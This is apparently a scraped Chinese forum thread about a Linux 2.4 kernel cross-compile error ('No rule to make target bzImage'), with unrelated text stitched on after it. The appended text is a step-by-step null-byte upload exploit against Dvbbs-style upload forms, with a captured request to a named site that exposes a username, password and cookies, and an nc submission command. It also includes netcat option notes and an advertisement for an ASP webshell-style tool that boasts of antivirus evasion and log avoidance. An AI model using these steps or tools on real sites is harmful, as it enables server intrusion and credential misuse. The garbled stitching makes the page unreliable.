----------------------> 老兵 求救 : 关于 No rule to make target 'bzImage'

xp4105 2007-12-17 05:14:31

我新下载源代码在/usr/src/linux-2.4.21里,因为正在做交叉编译环境,已经按顺序安装了binutils ,gcc-3.4.5。

我打算用gcc-3.4.5编译/usr/src/linux-2.4.21 ,于是修改了 /usr/src/linux-2.4.21 中的makefile ,

修改这2处 : ARCH=mips
CROSS——COMPILE=/opt/mips-toolchain/bin/mipsel-linux-

同时环境变量也设置到了 /opt/mips-toolchain/bin ,用set命令可以看到。

我就开始 make mrproper ,make menuconfig ,make dep ,make clean ,make bzImage ,

到make bzImage 时候,就提示 No rule to make target 'bzImage' 。

我不知道哪里出了问题,请大家指点。



...全文
4772 6 打赏 收藏 转发到动态 举报
AI 作业
写回复
用AI写文章
6 条回复
切换为时间正序
请发表友善的回复…
发表回复
alaiyeshi 2007-12-18
  • 打赏
  • 举报
回复
我的2.6下面确实是没有这个
因为不走这一步阿

Makefile里面没有baImage的定义,当然就没有Target了
不能盲信
你需要看看你自己的内核的makefile是怎么写的

另外系统的没有问题,你可以看下系统的,应该是有的
xp4105 2007-12-18
  • 打赏
  • 举报
回复
zg351229063


谢谢拉
zg351229063 2007-12-18
  • 打赏
  • 举报
回复
如果添加或删除了Import函数,或者修改了*.def文件。需要重新freeze才行。
如果不是接口的问题,可以查一下帮助。
搜索:“No rule to make target“既可。
xp4105 2007-12-18
  • 打赏
  • 举报
回复



谢谢 alaiyeshi

是我自己弄错了 呵呵

人丢大了:)

xp4105 2007-12-17
  • 打赏
  • 举报
回复


谢谢楼上的哥们。

但你说的也不对啊,你不信自己看看自己/usr/src/linux-x.x.xx 里面的Makefile里面,根本就没有

bzImage:XX
XX XX XX
这样的结构啊。

奇怪的是,编译安装系统时候的内核一点没有问题。

就是编译后来下载的内核就出问题。 不知道是哪里出的问题 。郁闷
alaiyeshi 2007-12-17
  • 打赏
  • 举报
回复
No rule to make target 'bzImage'
说明你的makefile里面没有
bzImage:XX
XX XX XX
这样的东西
编译的时候,请看下README或者INSTALL等等再开始做

还有就是内核编译的时候,一般都会在前一项结束以后提示你下一步做什么的
上传漏洞终结篇 一、写在前面 ***这个上传漏洞利用的原理只是针对form格式上传的asp和php脚本*** NC(Netcat)   用于提交数据包   DOS界面下运行:   NC -vv www.***.com 80<1.txt   -vv: 回显   80: www端口   1.txt: 就是你要发送的数据包  (更多使用方法请查看本区的帖子) WSE(WSockExpert)   对本机端口的监视,抓取IE提交的数据包  (不会用的就自己到网上搜资料N多) 二、漏洞原理 下面例子假设的前提 www主机: www.***.com; bbs路径 : /bbs/ 漏洞源于对动网上传文件的研究,建议有一定编程经验的 看看Dvbbs的upfile.asp文件,没有必要全部看懂 upfile是通过生成一个form表上传,如下
用到的变量: filepath 默认值uploadface 属性hiden act   默认值upload   属性hiden file1  就是你要传的那个文件 关键是 filepath 这个变量! 默认情况下我们的文件上传到www.***.com/bbs/uploadface/ 文件是用你的上传时间命名的,就是upfile里的这一句 FileName=FormPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&FileExt ------------------------------------------------------------------------- 我们知道计算机里面的数据是一"\0"为标致的用过C语言的都知道 char data[]="bbs" 这个data数组长度是4: b b s \0 如果我们构造filepath如下,会怎么样呢? filepath="/newmm.asp\0" 我们在2004.09.24.08.24传的文件就会发生变化 没有改时: http://www.***.com/bbs/uploadface/200409240824.jpg 用我们构造的filepath时: http://www.***.com/newmm.asp\0/200409240824.jpg 这样当服务器接收filepath数据时,检测到newmm.asp后面的\0 就理解为filepath的数据就结束了 这样我们上传的文件,比如c:\1.asp 就保存成: http://www.***.com/newmm.asp 三、后期补充 漏洞公布以后很多网站做了相应的处理,但是对于filepath的过滤和处理都不行 有很多网站只是加了N个hiden属性的变量对付网上公布的upfile.exe就是那个 上传漏洞利用工具或者filepath变量利用工具(老兵的)...但是最基本的没改啊。。 而且很对网站的插件里有类似的漏洞,我要说的不要依赖哪些专门的工具 自己改WSE抓到的包里的filepath变量,然后在用NC提交。。。 就算他加N个hiden变量也于事无补。 当然,如果对filepath做了很严格的过滤的话我们的这些理论就将宣告终结 就是我们的新理论诞生的时候! 四、漏洞列表 http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5369http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5530http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5531http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5693http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5731http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5746 监听外部主机     NC [-options] hostname port[s] [ports] ... 监听本地主机     NC -l -p port [options] [hostname] [port] options:     -d       detach from console, stealth mode     -e prog     inbound program to exec [dangerous!!]     -g gateway   source-routing hop point[s], up to 8     -G num     source-routing pointer: 4, 8, 12, ...     -h       this cruft     -i secs     delay interval for lines sent, ports scanned     -l       listen mode, for inbound connects     -L       listen harder, re-listen on socket close     -n       numeric-only IP addresses, no DNS     -o file     hex dump of traffic     -p port     local port number     -r       randomize local and remote ports     -s addr     local source address     -t       answer TELNET negotiation     -u       UDP mode     -v       verbose [use twice to be more verbose]     -w secs     timeout for connects and final net reads     -z       zero-I/O mode [used for scanning] port numbers can be individual or ranges: m-n [inclusive] 详细实例: --------------------------------------------------------------------------------- 一、WSE抓包结果(存到1.txt里): POST /bbs/upPhoto/upfile.asp HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: http://www.xin126.com/bbs/upPhoto/upload.asp Accept-Language: zh-cn Content-Type: multipart/form-data; boundary=---------------------------7d423a138d0278 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322) Host: www.xin126.com Content-Length: 1969 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDACCCCDCS=NJHCPHPALBCANKOBECHKJANF; isCome=1; GAMVANCOOKIES=1; regTime=2004%2D9%2D24+3%3A39%3A37; username=szjwwwww; pass=5211314; dl=0; userID=62; ltStyle=0; loginTry=1; userPass=eb03f6c72908fd84 -----------------------------7d423a138d0278 Content-Disposition: form-data; name="filepath" ../medias/myPhoto/ -----------------------------7d423a138d0278 ... ... 上传 -----------------------------7d423a138d0278-- --------------------------------------------------------------------------------- 二、UltraEdit打开1.txt改数据: ...... -----------------------------7d423a138d0278 Content-Disposition: form-data; name="filepath" /newmm.asp█         <===这个黑色代表一个空格是 0x20,改成0x00就可以了 ...... --------------------------------------------------------------------------------- 三、重新计算cookies长度,然后nc提交 Nc -vv www.xin126.com 80 <1.txt UltraEdit是一个16位编辑器网上可以下载得到 我们主要用来写那个结束标致: \0 ====>16位表示:0x00或者00H 其实你改的时候就直接再filepath的结尾处加个00就OK了 计算cookies长度===>你把fillepath改了之后、肯定是或+或—cookies的长度变了 ...... Host: www.xin126.com Content-Length: 1969 <======就是这个 Connection: Keep-Alive Cache-Control: no-cache ...... 计算会吧?一个字母、数字就是1 对于上传漏洞提出的解决思路:(仅供参考) 1、一般的上传是把上传路径作为一个变量来处理 ===>我们的对策就是把filepath变成常量。。。 这个方法是目前最有效的(我认为的) 2、加强对于\0的处理,原来我们是读到这里就结束 我们继续读直道下一个变量开始的地方,处理就OK了
欢迎使用桂林老兵站出品的“ASP站长助手”,请注意你手中的版本是否为最新版。 为了安全,本工具的登录方式为手工输入地址:在文件名后加上?action=login 版本:6.0 更新:2004-11-8 22:58 大小:30.4 KB (31,201 字节) 功能: 文件管理模块: 文件浏览/下载/删除/编辑/复制/移动/新建/上传; 目录新建/移动/删除/复制; 数据库管理模板: ACCESS数据库建立/压缩/操作; 以及常见数据库(MSSQL,MYSQL,DSN)的操作,附有操作示例代码; 命令行执行模板: 执行命令行程序,并回显。可以用来压缩目录来下载; 服务器支持组件信息查看 强调:本版本去掉了相对路径连接方式,全部采用绝对路径; 文件操作和上传时要输的路径为文件的全路径:盘符:\目录\文件名.扩展名; 目录操作时要输的路径为目录的全路径:盘符:\目录; ACCESS文件数据库的路径为文件的全路径:盘符:\目录\文件名.扩展名,请看示例代码; 优点:做到了真正的图形化操作,文件和目录的显示会有相应的图标显示; 操作时所产生的文件名,SQL操作符等参数全部采用POST来提交,不会在IIS日志中有记录; 对OBJECT进行了变形处理。一般不会被杀毒软件查杀。 可以自定义CMDSHELL的执行程序路径。 配置: ApplicationName = "Asp站长助手6.0" '#####程序名称/标题 UserPass = "gxgl.com" '#####初始登录密码 ShowFileIco = True '#####是否显示图标,False为用文字图标 IcoPath = "http://www.GXGL.com/images/FileType/" '#####图标目录,不必修改 附加:Filetype.rar备用图标目录。如果你是用来管理自己的网站的话,那么这个目录放在自己的空间上比较好管理。 用法:将dbm6.asp上传到支持ASP的空间上即可。连接时要在文件名后面手工加上action=login才能登录 操作数据库时请先连接显示表名后再输入SQL命令,不然会出错的。 默认在浏览数据库内容时每个字段最多只显示五十个字节。 要想浏览超过五十个字节的字段。可以这么做。 当只显示一条数据时就会显示全部字节了。可以通过SQL语言来控制。 如想全部显示ID为972的行的content字段的内容,可以这么构造SQL语句: select [content] from [article] where id=972 说明:文件操作使用的是FSO组件,上传使用的是ADODB.STREAM。 --------------------------------------------------------------------------------------------- 下载:http://www.gxgl.com/soft/dbm6.rar 作者:桂林老兵 网站:http://www.gxgl.com http://www.gxgl.net Q Q: 442331 Email: net@gxgl.com

4,465

社区成员

发帖
与我相关
我的任务
社区描述
Linux/Unix社区 内核源代码研究区
社区管理员
  • 内核源代码研究区社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧